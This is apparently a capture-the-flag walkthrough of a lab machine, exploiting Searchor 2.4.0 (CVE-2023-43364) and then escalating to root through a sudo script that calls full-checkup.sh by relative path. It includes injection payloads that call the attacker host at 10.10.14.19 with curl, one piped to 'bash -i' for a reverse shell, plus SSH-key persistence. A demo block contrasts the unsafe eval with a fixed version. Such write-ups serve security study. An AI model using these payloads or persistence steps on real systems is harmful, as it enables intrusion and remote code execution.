- The first step is to scan for open ports and then enumerate the versions and technologies running on them.

```
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.208 -oG scan
/opt/extractports scan
nmap -p22,80 -sCV -Pn 10.10.11.208 -oN ports
```

- I found the domain searcher.htb and added it to the hosts file.
- On entering the page I find that it is running Searchor 2.4.0. Searching for information about it, I find a vulnerability reported as CVE-2023-43364, which allows remote code execution (RCE).
- I start by running a test to validate that this CVE works: I inject code that makes a GET request to a server I set up locally. When I send the request I see the call arrive at my server, which confirms the injection works and that I can exploit it.

```
', exec("import os;os.system('curl http://10.10.14.19/pepe');"))#
```
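As an added illustration (not from the original writeup and not Searchor's actual source), here is a simplified model of the string-into-eval pattern that the payload above abuses, next to a hardened version that dispatches by name lookup and treats the query as data. The Engine enum, the function names and the SIDE_EFFECTS marker are constructed for the demo.

```python
from enum import Enum
from urllib.parse import quote

# Constructed marker: records whether injected code actually ran.
SIDE_EFFECTS: list = []


class Engine(Enum):
    """Stand-in for a search-engine enum; only the URL template matters here."""
    Google = "https://www.google.com/search?q={q}"
    Bing = "https://www.bing.com/search?q={q}"

    def search(self, query: str, copy_url: bool = False) -> str:
        # The query is treated purely as data and URL-encoded.
        return self.value.format(q=quote(query, safe=""))


def build_url_unsafe(engine: str, query: str, copy: bool = False) -> str:
    # Vulnerable pattern: the user-controlled query is spliced into Python
    # source text and eval'd, so a query that closes the string literal and
    # appends an expression (the shape of the payload above) runs as code.
    return eval(f"Engine.{engine}.search('{query}', copy_url={copy})")


def build_url_safe(engine: str, query: str, copy: bool = False) -> str:
    # Hardened: resolve the engine by enum-name lookup and pass the query as a
    # normal argument; no user input ever reaches eval.
    try:
        eng = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return eng.search(query, copy_url=copy)


# Constructed query in the same shape as the page's test payload, except that
# the injected statement only appends a marker instead of calling out.
PAYLOAD = "', exec(\"SIDE_EFFECTS.append('ran')\"))#"


if __name__ == "__main__":
    # Unsafe: the query is swallowed (q= is empty) and the marker is set.
    print(build_url_unsafe("Google", PAYLOAD), SIDE_EFFECTS)
    # Safe: the same input is just a URL-encoded query string, nothing runs.
    print(build_url_safe("Google", PAYLOAD))
```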

- I use pentestmonkey's reverse shell to get a shell on the box. With it I can move through the filesystem and read the first flag.

```
', exec("import os;os.system('curl http://10.10.14.19/rever.sh | bash -i');"))#
```

- To persist on the system more easily, I create an SSH key pair and add my public key to the authorized_keys file.

```
ssh-keygen -f key
cat key.pub
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /home/svc/.ssh/authorized_keys
ssh -i key svc@10.10.11.208
```
- When I check the ports in use on the system I find several that are not reachable from outside. I forward them over SSH so I can query them from my machine.

```
ssh -L 3000:127.0.0.1:3000 -L 5000:127.0.0.1:5000 -L 3306:127.0.0.1:3306 -L 44409:127.0.0.1:44409 -L 222:127.0.0.1:222 -i key svc@10.10.11.208
```
- On one of the ports I see that Gitea is running. First I have to add its domain to the hosts file.
- Searching through the Gitea files, I find a file containing a user's credentials.

- I check whether the password found belongs to any user other than cody and see that it is svc's password, the user we previously had a shell as.
- I list which commands I can run with sudo without providing a password and find a Python file.

- With this Python file I can run several docker commands. One of them is docker-inspect, which lets me see a container's configuration.

- When I inspect the configuration of the mysql_db container I find some passwords with which I can connect to MySQL.

```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '' mysql_db
```

- Inside MySQL I can't find anything relevant. I check for password reuse and confirm that it is the same password the administrator uses in Gitea. This lets me consult the administrator's repository, which contains the source code of the application I can run as root through sudo.
- Looking at the source code I find that absolute paths are used in most cases, except when running full-checkup.

- I look at the user's PATH and, in the first directory in it where I have write permission, create a full-checkup.sh file containing a script that lets me escalate my privileges.

```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
```
- I run the program and my script executes. This lets me launch a new terminal as root and read the second flag.
